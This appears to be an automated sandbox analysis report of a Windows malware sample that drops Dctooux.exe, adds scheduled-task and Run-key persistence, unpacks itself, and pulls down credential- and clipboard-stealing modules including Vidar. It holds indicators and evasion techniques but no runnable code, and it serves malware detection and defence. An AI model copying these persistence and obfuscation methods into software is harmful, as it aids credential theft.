Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe File created: C:\Users\user\AppData\Roaming\810b84e2bfa3a9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Mutant created: \Sessions\1\BaseNamedObjects\810b84e2bfa3a9e2d0d81a3d2ea89e46
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6632
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6336
Source: C:\Users\user\Desktop\C4v61Eu50U.exe File created: C:\Users\user\AppData\Local\Temp\154561dcbf Jump to behavior
Source: C4v61Eu50U.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\C4v61Eu50U.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C4v61Eu50U.exe ReversingLabs: Detection: 31%
Source: C4v61Eu50U.exe Virustotal: Detection: 38%
Source: C:\Users\user\Desktop\C4v61Eu50U.exe File read: C:\Users\user\Desktop\C4v61Eu50U.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\C4v61Eu50U.exe "C:\Users\user\Desktop\C4v61Eu50U.exe"
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 736
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 780
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 848
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 856
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 848
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 848
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 996
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 1080
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 1116
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe "C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe"
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 472
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 540
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 548
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 540
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 712
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 816
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 824
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 848 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\C4v61Eu50U.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Unpacked PE file: 0.2.C4v61Eu50U.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Unpacked PE file: 20.2.Dctooux.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Unpacked PE file: 28.2.Dctooux.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Unpacked PE file: 0.2.C4v61Eu50U.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Unpacked PE file: 20.2.Dctooux.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Unpacked PE file: 28.2.Dctooux.exe.400000.0.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0042F299 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0042F299
PE file contains an invalid checksum
Source: build.dll.28.dr Static PE information: real checksum: 0x4a045 should be: 0x1ef82
Source: build[1].dll.28.dr Static PE information: real checksum: 0x4a045 should be: 0x1ef82
Source: cred64[1].dll.28.dr Static PE information: real checksum: 0x0 should be: 0xa151
Source: clip64[1].dll.28.dr Static PE information: real checksum: 0x0 should be: 0x26385
Source: cred64.dll.28.dr Static PE information: real checksum: 0x0 should be: 0xa151
Source: vidar.exe.28.dr Static PE information: real checksum: 0x4fa67 should be: 0x9bba
Source: vidar[1].exe.28.dr Static PE information: real checksum: 0x4fa67 should be: 0x29853
Source: clip64.dll.28.dr Static PE information: real checksum: 0x0 should be: 0x26385
PE file contains sections with non-standard names
Source: cred64[1].dll.28.dr Static PE information: section name: _RDATA
Source: cred64.dll.28.dr Static PE information: section name: _RDATA
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_004212D6 push ecx; ret 0_2_004212E9
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00420C2C push ecx; ret 0_2_00420C3F
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_02F17053 push ebp; ret 0_2_02F1712B
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_02F181B0 pushad ; iretd 0_2_02F181B1
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_048F4176 push ebp; retf 0000h 0_2_048F4177
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_04900E93 push ecx; ret 0_2_04900EA6
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00420C2C push ecx; ret 20_2_00420C3F
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00413F0F push ebp; retf 0000h 20_2_00413F10
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_02E47A98 pushad ; iretd 20_2_02E47A99
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_02E4693B push ebp; ret 20_2_02E46A13
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_04944176 push ebp; retf 0000h 20_2_04944177
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_04950E93 push ecx; ret 20_2_04950EA6
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00420C2C push ecx; ret 28_2_00420C3F
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0044116B push ss; iretd 28_2_0044116C
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_004212D6 push ecx; ret 28_2_004212E9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_02F08FB0 pushad ; iretd 28_2_02F08FB1
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_02F07E53 push ebp; ret 28_2_02F07F2B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_03114176 push ebp; retf 0000h 28_2_03114177
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_03120E93 push ecx; ret 28_2_03120EA6
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe File created: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe File created: C:\Users\user\AppData\Local\Temp\1000101001\vidar.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vidar[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe File created: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll Jump to dropped file
Source: C:\Users\user\Desktop\C4v61Eu50U.exe File created: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe File created: C:\Users\user\AppData\Local\Temp\1000102011\build.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\build[1].dll Jump to dropped file
Creates job files (autostart)
Source: C:\Users\user\Desktop\C4v61Eu50U.exe File created: C:\Windows\Tasks\Dctooux.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run build.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run build.dll
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0041FA68 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0041FA68
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
